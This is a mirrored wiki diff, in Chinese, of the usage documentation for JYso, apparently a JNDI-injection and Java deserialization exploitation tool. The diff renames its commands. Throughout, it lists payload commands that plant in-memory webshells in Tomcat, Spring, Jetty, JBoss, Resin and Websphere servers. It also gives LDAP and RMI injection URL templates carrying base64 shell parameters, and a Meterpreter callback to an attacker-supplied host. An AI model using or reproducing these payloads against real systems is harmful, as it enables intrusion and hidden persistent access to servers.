mirror of
https://github.com/qi4L/JYso.git
synced 2026-09-26 16:51:52 +08:00
Updated JYso‐CN (markdown)
+20
-20
@@ -191,33 +191,33 @@ ldap://127.0.0.1:1389/[Basic or TomcatBypass]/E-Meterpreter/msf/[msf_ip]/[msf_po
|
|||||||
|
|
||||||
内存马:
|
内存马:
|
||||||
|
|
||||||
- 命令 `EX-MS-SpringInterceptorMS-...`:向系统内植入 Spring 拦截器类型的内存马
|
- 命令 `MS-SpringInterceptorMS-...`:向系统内植入 Spring 拦截器类型的内存马
|
||||||
- 命令 `EX-MS-SpringControllerMS-...`:向系统内植入 Spring Controller 类型的内存马
|
- 命令 `MS-SpringControllerMS-...`:向系统内植入 Spring Controller 类型的内存马
|
||||||
- 命令 `EX-MS-SpringWebfluxMS-...`:向系统内植入 Spring WebFilter 类型的内存马(仅支持 gz 及 cmd)
|
- 命令 `MS-SpringWebfluxMS-...`:向系统内植入 Spring WebFilter 类型的内存马(仅支持 gz 及 cmd)
|
||||||
- 命令 `EX-MS-TSMSFromJMXF`:利用 JMX MBeans 向系统内植入 Tomcat Filter 型内存马
|
- 命令 `MS-TSMSFromJMXF`:利用 JMX MBeans 向系统内植入 Tomcat Filter 型内存马
|
||||||
- 命令 `EX-MS-TSMSFromJMXS-...`:利用 JMX MBeans 向系统内植入 Tomcat Servlet 型内存马
|
- 命令 `MS-TSMSFromJMXS-...`:利用 JMX MBeans 向系统内植入 Tomcat Servlet 型内存马
|
||||||
- 命令 `EX-MS-TLMSFromJMXLi-...`:利用 JMX MBeans 向系统内植入 Tomcat Listener 型内存马
|
- 命令 `MS-TLMSFromJMXLi-...`:利用 JMX MBeans 向系统内植入 Tomcat Listener 型内存马
|
||||||
- 命令 `EX-MS-JFMSFromJMXF-...`:利用 JMX MBeans 向系统内植入 Jetty Filter 型内存马
|
- 命令 `MS-JFMSFromJMXF-...`:利用 JMX MBeans 向系统内植入 Jetty Filter 型内存马
|
||||||
- 命令 `EX-MS-JFMSFromJMXS-...`:利用 JMX MBeans 向系统内植入 Jetty Servlet 型内存马
|
- 命令 `MS-JFMSFromJMXS-...`:利用 JMX MBeans 向系统内植入 Jetty Servlet 型内存马
|
||||||
- 命令 `EX-MS-TFMSFromRequestF-...`:通过在线程组中找 Request 向系统内植入 Tomcat Filter 型内存马
|
- 命令 `MS-TFMSFromRequestF-...`:通过在线程组中找 Request 向系统内植入 Tomcat Filter 型内存马
|
||||||
- 命令 `EX-MS-TFMSFromRequestS-...`:通过在线程组中找 Request 向系统内植入 Tomcat Servlet 型内存马
|
- 命令 `MS-TFMSFromRequestS-...`:通过在线程组中找 Request 向系统内植入 Tomcat Servlet 型内存马
|
||||||
- 命令 `EX-MS-TFMSFromThreadF-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Filter 型内存马
|
- 命令 `MS-TFMSFromThreadF-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Filter 型内存马
|
||||||
- 命令 `EX-MS-TFMSFromThreadLi-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Listener 型内存马
|
- 命令 `MS-TFMSFromThreadLi-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Listener 型内存马
|
||||||
- 命令 `EX-MS-TFMSFromThreadS-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Servlet 型内存马
|
- 命令 `MS-TFMSFromThreadS-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Servlet 型内存马
|
||||||
- 命令 `EX-MS-JBFMSFromContextF-...`:通过全局上下文向系统内植入 JBoss/Wildfly Filter 型内存马
|
- 命令 `MS-JBFMSFromContextF-...`:通过全局上下文向系统内植入 JBoss/Wildfly Filter 型内存马
|
||||||
- 命令 `EX-MS-JBFMSFromContextS-...`:通过全局上下文向系统内植入 JBoss/Wildfly Servlet 型内存马
|
- 命令 `MS-JBFMSFromContextS-...`:通过全局上下文向系统内植入 JBoss/Wildfly Servlet 型内存马
|
||||||
- 命令 `EX-MS-RFMSFromThreadF-...`:通过线程类加载器获取指定上下文系统内植入 Resin Filter 型内存马
|
- 命令 `MS-RFMSFromThreadF-...`:通过线程类加载器获取指定上下文系统内植入 Resin Filter 型内存马
|
||||||
- 命令 `EX-MS-RFMSFromThreadS-...`:通过线程类加载器获取指定上下文系统内植入 Resin Servlet 型内存马
|
- 命令 `MS-RFMSFromThreadS-...`:通过线程类加载器获取指定上下文系统内植入 Resin Servlet 型内存马
|
||||||
- 命令 `EX-MS-WSFMSFromThread-...`:通过线程类加载器获取指定上下文系统内植入 Websphere Filter 型内存马
|
- 命令 `MS-WSFMSFromThread-...`:通过线程类加载器获取指定上下文系统内植入 Websphere Filter 型内存马
|
||||||
|
|
||||||
+ JNDI-Injection-Exploit 用法:
|
+ JNDI-Injection-Exploit 用法:
|
||||||
+ shell后可以加额外参数,需要base64编码,参数具体看1.5
|
+ shell后可以加额外参数,需要base64编码,参数具体看1.5
|
||||||
```
|
```
|
||||||
ldap://127.0.0.1:1389/[Basic or TomcatBypass]/[M-EX-MS-MemShellClass-...]/shell/base64params
|
ldap://127.0.0.1:1389/[Basic or TomcatBypass]/[M-MS-MemShellClass-...]/shell/base64params
|
||||||
```
|
```
|
||||||
|
|
||||||
```
|
```
|
||||||
rmi://127.0.0.1:1099/M-EX-MS-RFMSFromThreadF-..#params
|
rmi://127.0.0.1:1099/M-MS-RFMSFromThreadF-..#params
|
||||||
```
|
```
|
||||||
|
|
||||||
+ ysoserial
|
+ ysoserial
|
||||||
|
|||||||
Reference in New Issue
Block a user